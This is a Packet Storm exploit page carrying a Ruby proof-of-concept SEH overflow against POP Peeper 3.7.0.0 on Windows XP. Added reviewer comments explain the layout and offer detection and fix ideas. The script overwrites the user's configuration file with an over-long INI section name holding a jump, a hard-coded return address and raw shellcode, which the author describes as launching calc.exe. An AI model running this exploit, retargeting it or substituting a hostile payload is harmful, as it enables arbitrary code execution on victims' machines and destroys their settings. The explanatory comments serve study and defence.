POP Peeper 3.7 SEH Overflow

2011-03-18T00:00:00
ID PACKETSTORM:99470
Type packetstorm
Reporter Anastasios Monachos
Modified 2011-03-18T00:00:00

Description

                                        
                                            `#!/usr/bin/ruby  
#############################################################################  
# Title: POP Peeper 3.7 SEH Exploit  
# Tested on: Windows XP SP2 EN  
# Target: POP Peeper 3.7.0.0  
# Download Link: http://www.poppeeper.com/download.php  
# Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com  
# Greetz: offsec team, inj3ct0r team  
#############################################################################  
# Review overview: this script overwrites the current user's POP Peeper  
# configuration file with a single INI section whose name is well over 1 KB  
# long and ends in raw binary. The page title classifies the resulting fault  
# as an SEH overflow in POP Peeper 3.7.0.0; the parsing code that mishandles  
# the name is not shown on this page.  
# Detection: poppeeper.ini written by a process other than POP Peeper, or a  
# "[Act_...]" header far longer than an account name or holding non-printable  
# bytes.  

# %APPDATA% of the user running the script. ENV[] returns nil when the  
# variable is unset, in which case the concatenation on the next line raises.  
appdata = ENV['APPDATA']  
# Per-user POP Peeper settings file; presumably parsed by the application when  
# it loads its configuration (the page does not say when).  
file = appdata +"\\POP Peeper\\poppeeper.ini"  
# "wb" truncates any existing file, so the user's real configuration is  
# destroyed; binary mode keeps the raw bytes below free of newline translation.  
f = open(file, "wb")  
# Four bytes: an x86 short jump (EB 06) followed by two NOPs (90 90). They are  
# written directly before the address below. NOTE(review): in an SEH overwrite  
# this position normally holds the "next handler" field; inferred from the  
# page title, not shown by the code.  
eb = "\xeb\x06\x90\x90"  
# Little-endian encoding of 0x74D31567, which the author's trailing comment  
# attributes to oledlg.dll. The variable name suggests a pop/pop/ret sequence,  
# but the instructions at that address are not shown here. A hard-coded module  
# address ties the sample to that DLL build on the stated test system  
# (Windows XP SP2 EN); ASLR, SafeSEH and SEHOP are the platform mitigations  
# aimed at this pattern.  
ppr = "\x67\x15\xD3\x74" #Module Name=C:\WINDOWS\system32\oledlg.dll version=1.0 (XPClient.010817-1148)  
#Spawn calc.exe, bad characters: \x00\x0a\x0d  
# Opaque machine-code payload. The line above is the author's description and  
# the only evidence on this page for what it does; it was not disassembled for  
# this review. The listed "bad characters" are NUL, LF and CR, which would  
# presumably end or split the INI line before the whole name is read.  
shellcode = ("\xdd\xc3\xd9\x74\x24\xf4\x5a\xb8\x30\xe7\x16\x7d\x33\xc9" +  
"\xb1\x33\x31\x42\x17\x83\xc2\x04\x03\x72\xf4\xf4\x88\x8e" +  
"\x12\x71\x72\x6e\xe3\xe2\xfa\x8b\xd2\x30\x98\xd8\x47\x85" +  
"\xea\x8c\x6b\x6e\xbe\x24\xff\x02\x17\x4b\x48\xa8\x41\x62" +  
"\x49\x1c\x4e\x28\x89\x3e\x32\x32\xde\xe0\x0b\xfd\x13\xe0" +  
"\x4c\xe3\xdc\xb0\x05\x68\x4e\x25\x21\x2c\x53\x44\xe5\x3b" +  
"\xeb\x3e\x80\xfb\x98\xf4\x8b\x2b\x30\x82\xc4\xd3\x3a\xcc" +  
"\xf4\xe2\xef\x0e\xc8\xad\x84\xe5\xba\x2c\x4d\x34\x42\x1f" +  
"\xb1\x9b\x7d\x90\x3c\xe5\xba\x16\xdf\x90\xb0\x65\x62\xa3" +  
"\x02\x14\xb8\x26\x97\xbe\x4b\x90\x73\x3f\x9f\x47\xf7\x33" +  
"\x54\x03\x5f\x57\x6b\xc0\xeb\x63\xe0\xe7\x3b\xe2\xb2\xc3" +  
"\x9f\xaf\x61\x6d\xb9\x15\xc7\x92\xd9\xf1\xb8\x36\x91\x13" +  
"\xac\x41\xf8\x79\x33\xc3\x86\xc4\x33\xdb\x88\x66\x5c\xea" +  
"\x03\xe9\x1b\xf3\xc1\x4e\xd3\xb9\x48\xe6\x7c\x64\x19\xbb" +  
"\xe0\x97\xf7\xff\x1c\x14\xf2\x7f\xdb\x04\x77\x7a\xa7\x82" +  
"\x6b\xf6\xb8\x66\x8c\xa5\xb9\xa2\xef\x28\x2a\x2e\xde\xcf" +  
"\xca\xd5\x1e")  
  
# Layout of what is written, in order:  
#   "\r\n[Act_"          opens an INI section header  
#   "\x41" * 1088        1088 filler bytes ('A')  
#   eb, ppr, shellcode   the three values defined above  
#   "]\r\nEnabled = 1"   closes the header and adds one ordinary-looking key  
# The section name alone therefore exceeds 1 KB. NOTE(review): the root-cause  
# fix is presumably a length check on section names in POP Peeper's INI  
# parser; that code is not visible on this page.  
f.write("\r\n[Act_"+"\x41"*1088+eb+ppr+shellcode+"]\r\nEnabled = 1\r\n")  
f.close()  
  
`